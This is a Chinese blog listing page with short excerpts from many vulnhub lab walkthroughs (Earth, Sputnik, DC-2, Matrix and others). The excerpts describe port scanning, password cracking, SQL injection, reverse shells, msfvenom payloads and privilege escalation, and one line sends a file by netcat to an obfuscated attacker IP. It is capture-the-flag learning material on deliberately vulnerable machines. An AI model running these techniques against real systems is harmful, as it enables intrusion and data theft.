自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(29)
  • 收藏
  • 关注

原创 vulnhub-THE PLANETS-EARTH靶机

重复earthclimatechangebad4humans,猜测是密码,之前提示给到管理员用户terra。发送端:nc 0xc0.0xa8.0x72.0x83 6789 < /usr/bin/reset_root。在vulnhub有写到有两个flag,分别在root和user权限。开启攻击机(kali),也设置为Nat模式,与靶机处于同一网段。进入root文件夹,看到有flag文件,查看获得第二个flag。下载并导入靶机至VMWare,设置网络模式为NAT,开机。

2024-10-08 09:07:30 941

原创 vulnhub-Sputnik 1靶机

监听9876端口,在原有的shell运行payload,获取到新的shell后生成交互式shell。之前nmap还找到了一个目录/.git,其中的logs目录下的一个文件让我们去克隆一个项目。想要执行sudo -l得先获取交互式shell,使用msfvenom生成payload。设置完成后来到网站的搜索框,输入反弹shell命令。靶机在192.168.114.135,扫描端口。下载,然后上传到kali,在网站内安装。只需要在ed里输入!导入靶机,放在kali同网段,扫描。之前有个登陆界面,尝试登陆,成功。

2024-10-07 17:04:39 628

原创 vulnhub-digitalworld.local DEVELOPMENT靶机

在网上搜索之后得知这个PHP文件和CVE-2008-5762有关,可以导致远程文件包含,最主要的是slog_users.txt文件,访问。点进去是这样一个页面,sitemap链接和之后的链接都没什么用,这个登出按钮倒是有效果。发现密码是admin:1234,登进去之后比之前多报了两行错。访问之后获得了这样一些账户和MD5密文,可能是密码,尝试解密。开了几个端口,8080端口有网页,访问。导入靶机,放在kali同网段,扫描。看了一眼元素还有个数据包,下载下来。访问之前元素里的目录,只有个超链接。

2024-10-06 13:34:59 800

原创 vulnhub-DC 2靶机

这个shell不完整,只能用部分命令,尝试生成一个正常的shell,因为可以使用vi,所以可以在家目录下写一个.exrc文件,内容。现在生成了一个密码字典,为了能够爆破我们写一个用户名字典users,然后用wpscan爆破。似乎是提示我们要用域名dc-2,编辑hosts文件,访问,成功访问到。先用jerry的账户登录,找到了第二个flag,提示我们找第二个入口。提示让我们切换账户,现在已知的只有jerry,尝试一下。存在网站服务,访问,发现访问不到,做一下详细扫描。导入靶机,放在kali同网段,扫描。

2024-10-06 13:34:16 261

原创 vulnhub-Web Developer 1靶机

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag。靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp。真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次。靶机在192.168.114.129,扫描端口。根据sudo -l,我们可以运行tcpdump。导入靶机,放在kali同网段,扫描。执行完成后,再开一个终端,执行命令。这次多出来一个ipdata目录。里面有个cap文件,下载。登录wordpress。

2024-10-06 13:33:44 612

原创 vulnhub-unknowndevice64 2靶机

访问这个info.php直接就下载了,查看文件发现里面有个私钥,应该能用来登录,保存到一个文档里。5555是adb,6465是ssh,12345看样子应该是存在网站的,尝试访问一下。后来发现kali不行(可能是版本问题),转战CentOS7。要求输入密钥,应该是php文件里最后的注释。靶机在192.168.81.9,扫描端口。啥也没有,扫目录找到robots.txt。导入靶机,放在kali同网段,扫描。找flag,在system文件夹下。啥啊这都是,详细扫描一下。可以直接su root。

2024-10-03 18:27:28 322

原创 vulnhub-Replay 1靶机

这次这里显示的就不是Bob,而是新写入的命令,所以我们写入反弹shell的命令,但是要注意写入时要让文件大小不变,所以需要插入额外的字符。看了网上的分析这个程序实际上执行的是文件里的whoami,修改为uname -a,同时删除as后的冒号和空格。扫到几个,查看一下,files和media都是网页直接能访问到的东西,没啥用,robots指出一个新的文件。在bob家目录的文档文件夹下的.ftp文件夹找到了bob的密码文档。导入靶机,放在kali同网段,扫描。开启了三个端口,存在网站服务,访问。

2024-10-02 10:09:04 263

原创 vulnhub-W34kn3ss 1靶机

80端口没什么东西,443似乎访问到的是同一个界面,这种情况下一般是需要绑定域名(以前做靶机做到的)有两个文件,其中一个是公钥,下载,notes.txt提示这个公钥由openssl生成,并且给出了版本。是个python编译的文件,反编译(各显神通吧,我直接丢给ChatGPT了),最后得到密码。下载链接的文件,解压,复制好公钥的Base64字符串,执行命令。绑定之后,访问80端口进入的就是新的页面,有个n30。我们找到了匹配的公钥,现在可以使用对应的私钥链接。扫到三个端口,存在网站服务,访问。

2024-10-02 10:08:32 333

原创 vulnhub-Matrix 1靶机

可以使用任意sudo命令,切换root账户(这里需要输入密码,我之前看别的东西输入过了就不用输)80端口的网页没什么信息,31337的网页元素里有注释。得知了账户guest的部分密码(缺少最后两位)获取到/bin/bash后,还需要设置环境变量。存在三个端口,有两个都是http服务,访问。似乎是有一个文件,尝试访问一下,直接下载了。靶机在192.168.81.6,扫描端口。这个shell很多命令不给用,尝试换一个。使用sudo -l查看可以使用的sudo。提权成功,flag在root目录。

2024-10-02 10:07:59 301

原创 vulnhub-wakanda 1靶机

网站底下写着站长mamadou,猜测是他的密码,尝试连接,之间扫描到ssh端口为3333。现在获取到了devops的shell,之前搜索文件时看到他的家目录有第二个flag。在tmp文件夹下找到文件test,里面什么都没有,但是这个文件属于devops。在kali创建文件后,开启Python的HTTP服务,在靶机下载文件。看起来这个文件在不停的执行命令,并且我们有写入权限,写个木马进去。虽然扫到了,但是所有页面大小都是0B,也就是没有任何内容返回。导入靶机,放在kali同网段,扫描。

2024-09-29 08:33:22 1937

原创 vulnhub-Basic Pentesting 2靶机

导入靶机(建议VirtualBox,VMWare扫不到),放在kali同网段,扫描。kay的家目录下有个.ssh文件夹,里面有两个连接用的密钥。这应该就是kay的密码,使用sudo -l 命令。复制下来,放在文档里(我取名为key),破解。可以使用任意sudo命令,sudo su提权。jan没法用sudo命令,尝试切换到kay。靶机在192.168.81.3,扫描端口。是Tomcat的页面,也没啥东西。尝试从ssh服务突破,枚举用户。很多端口,存在网站服务,访问。找到两个用户,尝试爆破密码。

2024-09-28 08:52:01 497

原创 vulnhub-BlackMarket 1靶机

DimitryHateApple这个词很唐突,或许是个密码,尝试登录dimitri,首先获得交互式shell。在BlackMarket库下flag表找到第三个flag,然后提示要找到一个邮箱,爆破user表。到这一步我去看了一下WP,似乎这个Flag指向的是一个电影,通过Wiki的资料生成一个字典。登陆需要密码,怀疑flag4哪里的“access”是个同义词,也就是说密码就是?登陆界面,没有能登陆的信息,查看一下元素找到一个flag。既然有邮箱,那么应该就有邮箱登录的地方,扫一下网站目录。

2024-09-27 08:45:10 574

原创 vulnhub-Bob 1.0.1靶机

脚本是输出了很多文本,之前login.html里bob说把密码写在Notes里,应该就是指这个。又在bob的文档文件夹找到个gpg加密文件,下载下来,现在需要密钥。就是说有个webshell,看看/dev_shell.php。开启了三个端口,有一个未知服务,加上-A参数详细扫描一下。指出两个新的页面,先看看/lat_memo.html。试了一下找到的能运行的命令只有id,别的都被阻止了。25468是ssh服务,存在网站服务,访问。导入靶机,放在kali同一网段,扫描。网站没什么东西,登录功能也是关掉的。

2024-09-26 09:53:34 718

原创 vulnhub-W1R3S 1.0.1靶机

这个靶机非常简单,如果之前有做过一些靶机的朋友建议不要看WP直接上手,第一次做靶机的也可以用来学习打靶机的基本流程

2024-09-25 09:18:14 154

原创 vulnhub-DerpNStink 1靶机

前几个都禁止访问,剩下的除了一个phpMyAdmin工具的登陆界面外,robots文件还指出了temporary,但是页面里也没什么东西。在ftp的ssh文件夹下有个key.txt(套了很多层ssh文件夹),不过不能拿来连接。发现两个家目录,密码应该是stinky的,但是测试之后ssh连接需要密钥。用wireshark打开pcap文件,查看tcp数据流,找到账号密码。发现有个flag2,找了一圈在网站主页的元素发现flag1。提权成功,在root文件夹的桌面文件夹找到flag。

2024-09-24 10:29:22 618

原创 vulnhub-Basic Pentesting 1靶机

在shadow文件里找到marlinspike的密码哈希,复制进行破解,得到marlinspike。在网页最底下可以看到这是个WordPress的站,尝试访问管理页面(wp-admin)使用sudo -l命令发现我们可以无密码使用任意sudo命令,sudo su提权。我们可以使用MSF的WordPress利用脚本来获取shell。扫描到靶机IP为192.168.114.129,扫描端口。导入靶机,和kali同一网段,扫描。扫描出三个端口,存在网站服务,访问。扫描到一个secret目录,访问。

2024-09-23 11:44:03 500

原创 vulnhub-Depth 1靶机

sh &123 2>&123',我们只需要单引号里的内容。执行后发现网页开始加载,证明命令成功执行,但是没有shell反弹出来,可能是靶机防火墙过滤了流量。sudo -l显示我们可以无密码执行任何sudo命令,所以直接 sudo su。尝试使用这个命令框反弹shell,先在kali的6789端口开启监听。导入靶机,和kali同一网段,开启靶机时就给出了IP地址。/test.jsp是一个可以执行查看目录命令的页面。拼接到ssh命令后,使用刚才获得的账户名,输入。成功获得shell,开始提权。

2024-09-22 15:20:18 411

原创 vulnhub-Dina 1.0.1靶机

下载下来后导入靶机,和kali同一网段,根据靶机表述,目标是root目录下的flag文件,先扫描靶机IP。这个靶机不知道为什么下载速度很慢几乎没有进度,但是我用迅雷就能正常下载,建议下不下来的也找个下载器试试。点击网页的按钮,发现跳转到了一个ange1目录下,但是目录里什么都没有。在网站里没找到什么有用的功能点,尝试在MSF找一下CMS的漏洞。通过目录扫描找到了几个目录,先看robots.txt。至此完成提权,剩下的就是去root目录拿flag。尝试刚才获得的密码,发现是freedom。

2024-09-22 15:18:07 400

原创 vulnhub-RickdiculouslyEasy 1靶机

VirtualBox的仅主机网卡在56网段(注意这里我配置了两块网卡,一块桥接到VirtualBox,一块为VMware的NAT,arpscan会默认使用NAT网卡从而扫不到IP,需要-I指定网卡,网卡信息可以用ifconfig查询)发现FTP服务允许匿名登陆,里面有flag.txt,还有三个新扫描的端口,13337直接显示了一个10分flag,22222端口也开着ssh,60000端口描述疑似和反弹shell有关。发现两个文件,一个10分flag,一个html文件,网页元素里有密码winter。

2024-09-20 10:30:36 749

原创 vulnhub-zico2 1靶机

可以看到这个目录下有个php文件,点开之后是个phpliteadmin的登陆界面,这是个数据库管理工具。点击页面的按钮,在第三个页面的"CHECK THEM OUT"按钮,弹出了一个新的页面。尝试搜索phpLiteAdmin的漏洞利用工具,找到1.9.3对应版本下载下来,查看。发现我们确实可以访问,目前没什么值得访问的文件,所以先去看看别的。经过查询,这个工具的默认密码是admin,试了一下确实可以登录。扫描网站目录,发现了一些路径,先来看dbadmin。开放了四个端口,存在网站,常规思路。

2024-09-19 09:44:32 388

原创 vulnhub-Breach 2.1靶机

网站存在一个搜索框,看到这个一般就会考虑XSS或者搜索型SQL注入,尝试发现确实存在SQL注入(输入单引号会导致不输出结果条数,正常至少输出一个0)输入密码之后直接关闭连接,和之前做的一个靶机非常像,但是没有弹出错误提示说明密码正确,尝试指定/bin/bash也不起作用,再次收集端口信息。弹出了一段信息,比较有用的是第四行,给出了peter账户,并且有一个灯下黑的密码"inthesource"给出了一个坐标,经查询是Houston(休士顿,我们遇到麻烦了),估计是个密码(毕竟这里已经显示让登录了)

2024-09-18 19:54:48 746

原创 vulnhub-Web Machine N7

dirsearch扫不出来,尝试一下gobuster(后来dirsearch换字典发现也可以,我的锅)两次URL解码后是Base密文,再解密得到的不知道是啥,尝试了一下是MD5。在上传界面的源码里就写成了localhost,改为靶机地址再上传。解出来是admin,尝试登录admin.php加上Cookie。有个exploit.html,进入发现是一个文件上传界面。尝试上传一个文件,发现跳转出来的网页是localhost。开启靶机,与kali在同一网段,扫描靶机IP。放包,获得后半段flag。

2024-09-18 09:23:36 247

原创 vulnhub-Hogwarts Dobby靶机

之前密码提示德拉科的密码是他的房子,记忆里原著没说,看了网上WP是斯莱特林的英文(slytherin)访问发现一串brainfuck加密的密文,还发现这个网站是用WordPress搭的。从Wordpress下手,用wpscan扫描,扫出来draco用户。逛了一圈两个页面一个不让访问,一个就是单纯的phpinfo。既然有了wordpress后台权限,写个shell简简单单。找了一下所有SUID提权命令,发现可以find。cat不行,more读取文件,找到了flag。发现一句话,是密码的提示。

2024-09-18 09:02:51 274

原创 vulnhub-Deathnote 1靶机

有两个文件,音频文件输出了一串16进制数,hint提示要用Cyberchef,尝试解密。解出来passwd : kiraisevil,猜测就是kira的密码,切换用户。有个用户名kira,之前还收集到一个疑似密码的东西,尝试登陆,确实是这个密码。给定向到了/wordpress,还访问不到,设置hosts文件绑定一下。kira留下的,猜测kira是管理员用户,看看有没有L相关信息。发现一串加密密文,查了一下是Brainfuck加密,尝试解密。爆出来用户名l,密码death4me,尝试ssh连接靶机。

2024-09-18 08:55:39 311

原创 vulnhub-FristiLeaks 1.3靶机

如果网络配置没有问题,靶机在启动的时候就会直接显示自己的IP地址(这里显示在192.168.114.0网段,这是我的VMWare的NAT网卡网段,证明和kali在同一网段下)发现有两个登陆相关的php文件,还有一个uploads文件夹,说明这个网站可能时存在文件上传功能点的。署名是eezeepz,那么之前解出来的图片就有可能是密码,尝试在网站登陆一下。上传完成,访问文件,这里涉及到一个文件解析漏洞,访问成功即可。基本上是一些命令,有四个文件可以查看一下,比较有用的是这三个。

2024-09-15 13:15:36 687

原创 vulnhub-SkyTower 1靶机

如果发现不允许选择桥接模式,提示没有空余网卡,那么把VMWare自带的桥接模式网卡0的自动桥接改成随便一个网卡,设置完新建网卡后再调回去。这个靶机要导入到Virtual box,所以我们同时要给VMWare里的kali设置网卡连接到Virtual box的虚拟机里。发现输入密码后会被关闭连接,但是至少我们可以进入到SSH连接过程,可能是连接后没有给出一个shell,导致直接断开。开启靶机(靶机默认网卡和Virtual box自带的不一样,也得选择一下),kali调到新建的网卡上。

2024-09-14 15:52:22 348

原创 vulnhub-Kioptrix Level 1.2靶机

将靶机和kali都放在VMWare默认的NAT网卡下(我这里的网段是192.168.114.0)之后发现gallery库中有个dev_account表,其中存放着一些账户信息。尝试用sudo su切换到root,发现被禁止了,只能从ht下手。sudo运行文档编辑器,证明我们可以用它修改任意文件。发现确实存在SQL注入,那么就可以进行爆破信息了。F3开启界面,选择文档打开,我们选择passwd。只是一个普通的用户,查看一下sudo权限。在网站的Blog功能下看到了一个网址。绑定之后就可以访问网页了。

2024-09-14 14:41:31 390

原创 vulnhub-21LTR SCENE1靶机

注意这一步并非100%成功,观察了一下似乎是因为10001端口不会一直开放,但是这个方法一定存在,所以要做的就是不停的输入这个命令直到碰巧遇到端口开放(本人试了30多次才成功)这个是写入日志文件,就是之前的php文件,所以我们写入一句话木马

2024-09-14 13:39:04 255

原创 vulnhub-De-ICE_S1.120靶机

echo "/bin/bash" > getlogs.sh 写入一个/bin/bash到和原文件名一样的文件中。导入靶机,靶机默认IP192.168.1.120,所以新建一张仅主机网卡在1网段,将靶机和kali放在这张网卡下。扫出来了一堆账户和密码,联系到之前看到开启了ssh服务,尝试登录,使用swarren:kotaku组合登录。尝试爆破账号和密码,密码存在hash加密,使用SQLMAP默认方式爆破,因为有很多用户所以爆破会很慢。看了一下网上的WP,ccoffee账户的家目录下有个可利用的文件。

2024-09-14 11:07:35 368

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除